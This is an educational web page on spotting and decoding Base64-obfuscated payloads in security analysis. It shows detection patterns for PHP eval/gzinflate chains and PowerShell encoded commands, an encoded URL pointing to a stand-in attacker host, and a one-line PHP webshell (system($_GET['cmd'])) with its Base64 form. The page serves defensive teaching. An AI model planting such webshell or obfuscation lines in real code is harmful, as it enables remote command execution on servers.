Base64 Decoding for Security Analysis
Base64 turns binary data into ASCII text using a 64-character alphabet (A-Z, a-z, 0-9, +, /). Attackers use it to hide malicious payloads inside scripts, email attachments, and web page source code. The encoded string looks like random characters, but decoding it often reveals URLs, shell commands, or entire executable scripts.
Try it now
Encoder / Decoder
Runs in your browser, nothing leaves your device.
Look for long strings of alphanumeric characters ending in one or two = padding characters. In PHP malware, you'll often see `eval(base64_decode('...'))`. In JavaScript, it shows up as `atob('...')` or inside data URIs like `data:text/html;base64,...`. Email attachments use Base64 for every MIME part. If a string is divisible by 4 characters and only uses [A-Za-z0-9+/=], it's almost certainly Base64.
PHP backdoors chain Base64 with eval, gzinflate, or str_rot13 to hide webshells. A typical pattern: `eval(gzinflate(base64_decode('...')))` which first decodes, then decompresses, then executes. JavaScript droppers embed entire HTML phishing pages as Base64 data URIs. Powershell attacks use `-EncodedCommand` which accepts Base64-encoded UTF-16LE scripts.
Examples
Hidden URL in Base64
aHR0cHM6Ly9ldmlsLmV4YW1wbGUuY29tL3N0ZWFsLnBocA==
https://evil.example.com/steal.php
PHP webshell pattern
eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7'))
system($_GET['cmd']);
Security context
Base64 is not encryption. It provides zero security, only obfuscation. Any tool can reverse it instantly. When you find Base64 in source code, the interesting question is why someone felt the need to encode it in the first place.
Frequently asked
Paste the encoded string into a Base64 decoder tool. For chained encoding (e.g., Base64 + gzip), decode the Base64 first, then decompress. Never execute decoded content directly, as it may contain malicious code.
Not always. Base64 is used legitimately in email attachments, data URIs, and API tokens. It becomes suspicious when combined with eval(), exec(), or system() calls, or when it appears in places where readable code would be expected.
Go deeper
Continue in the Web Security Academy
Related techniques
Hex Encoding in Malware and Obfuscated Code
Decode hex-encoded strings in malware samples, obfuscated JavaScript, and network traffic. Identify file signatures by magic bytes.
URL Encoding and Decoding
Decode percent-encoded URLs to reveal hidden paths, parameters, and payloads. Detect double-encoding attacks and URL-based injection attempts.
PHP eval(base64_decode()) Malware Patterns
Identify and decode PHP webshells and backdoors that use eval(base64_decode()). Common patterns in WordPress hacks, file upload exploits, and server compromises.
JavaScript Deobfuscation Techniques
How to deobfuscate JavaScript malware, phishing scripts, and browser exploits. Reverse eval packing, string rotation, array shuffling, and control flow flattening.